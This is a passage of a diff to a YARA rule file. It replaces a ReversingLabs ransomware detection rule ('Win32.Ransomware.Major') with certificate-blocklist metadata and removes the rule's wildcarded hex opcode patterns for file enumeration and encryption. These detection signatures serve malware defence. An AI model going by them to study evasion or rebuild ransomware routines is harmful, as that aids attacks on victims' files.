+		id = "2f72a686-c30c-572d-a78c-03747ac325b6"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Major.yara#L1-L261"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "16fb7763e3806fca6937fef7e8b3d8bccd61cb39549061d359d630c7d266c270"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12084-L12100"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2d4bc88943cdc8af00effab745e64e60ef662c668a0b2193c256d11831ef1554"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Major"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 33 C0 89 4D ?? 57 50 66 89 45 ?? 8D 8D ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 57 C0 C7 45 ?? ?? ?? ?? ?? 50 C7 45 ?? ??
-            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F 13 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48
-            ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84
-            0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 4D ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 33 C9 8B F8 51 89 4D ?? 51 8D 4D ?? 89 7D ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 4D ??
-            8D 45 ?? 50 FF 77 ?? 57 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 47 ?? 89 4D ?? BB ?? ?? ??
-            ?? 8B 48 ?? 89 01 8B 07 8D 4D ?? 83 C0 ?? 3B C8 74 ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 8D 45 ?? 3B C6
-        }
-		$find_files_p2 = {
-            0F 84 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 0F 87 ?? ?? ??
-            ?? 03 C0 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ??
-            ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ??
-            ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? 83 7E ??
-            ?? 73 ?? 8B 46 ?? 83 C0 ?? 74 ?? 03 C0 50 8D 45 ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? EB
-            ?? 8B 06 89 45 ?? C7 06 ?? ?? ?? ?? 8B 46 ?? 89 45 ?? 8B 46 ?? 89 45 ?? C7 46 ?? ??
-            ?? ?? ?? 83 7E ?? ?? C7 46 ?? ?? ?? ?? ?? 72 ?? 8B 36 33 C0 66 89 06 8B 45 ?? 83 F8
-            ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 03 C0 3D ?? ?? ?? ?? 72 ?? F6
-            C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ??
-            ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 3F 8D 77 ?? 8B
-            4F ?? 8B 07 89 01 8B 0F 8B 47 ?? 89 41 ?? 8B 45 ?? 48 89 45 ?? 89 45 ?? 8B 46 ?? 83
-            F8 ?? 72 ?? 8B 0E 40 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 03 C0 3D ?? ?? ?? ?? 72 ?? F6
-        }
-		$find_files_p3 = {
-            C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ??
-            ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 46 ?? ?? ?? ??
-            ?? 83 7E ?? ?? C7 46 ?? ?? ?? ?? ?? 72 ?? 8B 36 33 C0 57 66 89 06 E8 ?? ?? ?? ?? 83
-            C4 ?? 8D 8D ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ?? 8B
-            F8 89 7D ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 66 66 66 0F 1F 84 00 ?? ?? ?? ?? 33 C0 C7 45
-            ?? ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? 0F 84 ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? 8B 08 85 C9 74 ?? 8B 85 ?? ?? ?? ?? 8B 00 8D 14 41 EB ?? 8B 85
-            ?? ?? ?? ?? 8B 08 8B 85 ?? ?? ?? ?? 8B 00 8D 14 48 8B 85 ?? ?? ?? ?? 8B 08 2B D1 D1
-            FA 81 FA ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 8D 04 12 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85
-            ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9
-            ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? C7 00 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 00
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 00 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? 50 89 85 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72
-            ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 03 C0 3D ?? ?? ?? ?? 72 ?? F6 C1
-        }
-		$find_files_p4 = {
-            0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ??
-            83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 68
-            ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ??
-            ?? 8B D4 33 C0 C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? 66 89 02 66 39 85 ?? ?? ??
-            ?? 75 ?? 33 C9 EB ?? 8D 8D ?? ?? ?? ?? 8D 71 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B
-            CE D1 F9 51 8D 85 ?? ?? ?? ?? 8B CA 50 E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 85 C0
-            0F 84 ?? ?? ?? ?? 6A ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? C7 45 ??
-            ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 83 CB ?? C7 45 ??
-            ?? ?? ?? ?? 66 89 45 ?? 66 39 85 ?? ?? ?? ?? 75 ?? 33 C9 EB ?? 8D 8D ?? ?? ?? ?? 8D
-            51 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 51 8D 85 ?? ?? ?? ?? 50 8D 4D ??
-            E8 ?? ?? ?? ?? 8D 45 ?? 83 CB ?? 50 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0
-            0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85
-        }
-		$find_files_p5 = {
-            83 CB ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 CB ?? 50 8D 85 ??
-            ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 CB ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 83 CB ?? 50 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 85 C0 74 ??
-            C6 45 ?? ?? F6 C3 ?? 74 ?? 8B 45 ?? 83 E3 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ??
-            E8 ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? F6 C3 ??
-            74 ?? 8B 85 ?? ?? ?? ?? 83 E3 ?? 83 F8 ?? 72 ?? 40 8D 8D ?? ?? ?? ?? 50 FF B5 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? 66 89 85 ?? ?? ?? ?? F6 C3 ?? 74 ?? 8B 85 ?? ?? ?? ?? 83 E3 ?? 83 F8 ?? 72 ?? 40
-            8D 8D ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? F6 C3 ?? 74 ?? 8B 85 ?? ??
-            ?? ?? 83 E3 ?? 83 F8 ?? 72 ?? 40 8D 8D ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ??
-            ?? ?? 8B 45 ?? 83 E3 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 33 C0
-        }
-		$find_files_p6 = {
-            C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? 83 E3 ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? 83 F8 ?? 72
-            ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 80 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 75 ?? 8D 45 ?? 50 8D 4D ?? FF 76 ?? 56 E8 ?? ??
-            ?? ?? 8B 55 ?? B9 ?? ?? ?? ?? 2B CA 83 F9 ?? 0F 82 ?? ?? ?? ?? 89 46 ?? 42 8B 48 ??
-            89 55 ?? 89 01 E9 ?? ?? ?? ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 75 ??
-            8D 45 ?? 50 8D 4D ?? FF 76 ?? 56 E8 ?? ?? ?? ?? 8B 55 ?? B9 ?? ?? ?? ?? 2B CA 83 F9
-            ?? 0F 82 ?? ?? ?? ?? 89 46 ?? 42 8B 48 ?? 89 55 ?? 89 55 ?? 89 01 8B 45 ?? 83 F8 ??
-            72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 8D ?? ?? ?? ?? 54 E8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8D 85 ?? ?? ?? ?? 8B CC 50 E8 ?? ?? ?? ?? 8B 75
-            ?? 8B CE E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
-            45 ?? 8B CE 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 7D ??
-            8B CF E8 ?? ?? ?? ?? 8B 4D ?? 85 C9 74 ?? 8B 7D ?? E9 ?? ?? ?? ?? 8B 4D ?? 85 C9 0F
-            84 ?? ?? ?? ?? 0F 1F 00 8B 45 ?? 8D 4D ?? 8B 00 83 C0 ?? 3B C8 74 ?? 6A ?? 6A ?? 50
-            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4
-        }
-		$find_files_p7 = {
-            8D 45 ?? 3B C6 74 ?? 8B 4D ?? 83 F9 ?? 72 ?? 41 51 FF 75 ?? 8B C8 E8 ?? ?? ?? ?? 33
-            C0 C7 45 ?? ?? ?? ?? ?? 56 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ??
-            8B 45 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
-            ?? 83 7D ?? ?? 8D 8D ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ?? 8B 75
-            ?? 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 0F 1F 00 33 C0 C7 45 ?? ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 45 ??
-            6A ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF
-            75 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ??
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            8D 85 ?? ?? ?? ?? 83 EC ?? F6 85 ?? ?? ?? ?? ?? 8B CC 50 0F 84 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B CF E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 5D ?? 8D 45 ?? 50 8D 4D ?? FF 73 ?? 53 E8 ?? ?? ?? ?? B9 ?? ?? ?? ??
-            2B CE 83 F9 ?? 0F 82 ?? ?? ?? ?? 89 43 ?? 46 8B 48 ?? 89 75 ?? 89 01 8B 45 ?? 83 F8
-            ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 8D ?? ?? ?? ?? 54 E8 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 85 C0 74
-            ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B CF 50 E8 ?? ?? ?? ?? 8B
-            45 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF
-            75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 85 F6 0F 85 ??
-            ?? ?? ?? FF 75 ?? FF 15
-        }
-		$encrypt_files_p1 = {
-            FF 15 ?? ?? ?? ?? 85 C0 75 ?? 50 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D
-            45 ?? 83 7D ?? ?? 0F 43 45 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 33 C0 C7 45 ?? ??
-            ?? ?? ?? 6A ?? 50 66 89 45 ?? 8D 4D ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 6A ?? 0F
-            43 45 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 89 45 ?? FF 15 ?? ?? ??
-            ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ??
-            ?? ?? ?? 8B 4D ?? 01 0D ?? ?? ?? ?? 8B 55 ?? 11 15 ?? ?? ?? ?? 83 FA ?? 0F 8C ?? ??
-            ?? ?? 7F ?? 85 C9 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? 66 66 0F 1F 84 00
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85
-            FF 74 ?? 8B 55 ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? 8B 55 ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? C7 45 ?? ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? 8B 4D ?? 83 C4 ?? 6A
-        }
-		$encrypt_files_p2 = {
-            50 E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 57 53 FF 15 ?? ?? ?? ??
-            8B 55 ?? 8B 4D ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 56 8D 85
-            ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? F7 D8 6A ?? 6A ?? 50 53 FF 15 ??
-            ?? ?? ?? 8B 55 ?? 8D 45 ?? 8B 4D ?? 6A ?? 50 E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 50 56 53 FF 15 ?? ?? ?? ?? 83 6D ?? ?? 0F 85 ?? ?? ?? ?? 57 E8 ?? ??
-            ?? ?? 56 E9 ?? ?? ?? ?? 8B F1 8B C2 81 C6 ?? ?? ?? ?? 83 D0 ?? 83 F8 ?? 0F 87 ?? ??
-            ?? ?? 72 ?? 81 FE ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F
-            59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? 66 90
-            68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2
-            0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 8B
-            55 ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 55
-            ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50
-        }
-		$encrypt_files_p3 = {
-            E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? C7 45 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? 8B 4D ?? 83 C4 ?? 6A ?? 50 E8 ?? ??
-            ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 57 53 FF 15 ?? ?? ?? ?? 8B 55 ?? 8B
-            4D ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 56 8D 85 ?? ?? ?? ??
-            57 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? F7 D8 6A ?? 6A ?? 50 53 FF 15 ?? ?? ?? ?? 8B
-            55 ?? 8D 45 ?? 8B 4D ?? 6A ?? 50 E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 50 56 53 FF 15 ?? ?? ?? ?? 83 6D ?? ?? 0F 85 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 56 E9
-            ?? ?? ?? ?? 8B F1 8B C2 81 C6 ?? ?? ?? ?? 83 D0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 72 ??
-            81 FE ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? 66 90 68 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 8B 55 ?? 8B 4D
-            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 4D ??
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 8B F0 83 C4 ?? 85 F6 74 ?? C7 45 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68
-        }
-		$encrypt_files_p4 = {
-            50 E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? 8B 4D ?? 83 C4 ?? 6A ?? 50 E8 ?? ?? ?? ?? F2 0F
-            59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 57 53 FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? E8 ??
-            ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 56 8D 85 ?? ?? ?? ?? 57 50 E8 ??
-            ?? ?? ?? 8B 45 ?? 83 C4 ?? F7 D8 6A ?? 6A ?? 50 53 FF 15 ?? ?? ?? ?? 8B 55 ?? 8D 45
-            ?? 8B 4D ?? 6A ?? 50 E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 56 53
-            FF 15 ?? ?? ?? ?? 83 6D ?? ?? 0F 85 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 56 E9 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? 0F 1F 84 00 ?? ?? ?? ??
-            68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B F0 83 C4
-            ?? 85 F6 74 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? 66
-            0F 1F 84 00 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8
-            ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 8D 45 ?? 6A ?? 50 FF 75 ?? 56 53 FF 15 ?? ?? ?? ?? FF 75 ?? 8D 85 ??
-            ?? ?? ?? 57 56 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? F7 D8 6A ?? 6A ?? 50 53 FF 15 ??
-            ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 57 53 FF 15 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 57 E8
-            ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 0F 57 C0 66 0F 13 45 ?? 6A ?? 50 6A ?? 53 FF 15 ?? ??
-            ?? ?? 8B 75 ?? 8D 45 ?? 6A ?? 50 FF B6 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ??
-            ?? 50 FF B6 ?? ?? ?? ?? 53 FF D7 8B 35 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 6A ?? 6A ?? 6A
-            ?? 6A ?? FF 35 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF D6 85 C0 0F
-            84 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 35 ?? ?? ??
-            ?? FF D6 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 0F 1F 40 ?? 8B 45 ?? 03 C0 50 E8 ??
-            ?? ?? ?? 8B F0 83 C4 ?? 80 3E ?? 74 ?? 8B 45 ?? 8B CE 85 C0 74 ?? 66 90 C6 01 ?? 8D
-            49 ?? 83 E8 ?? 75 ?? 8D 45 ?? 50 56 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 15 ??
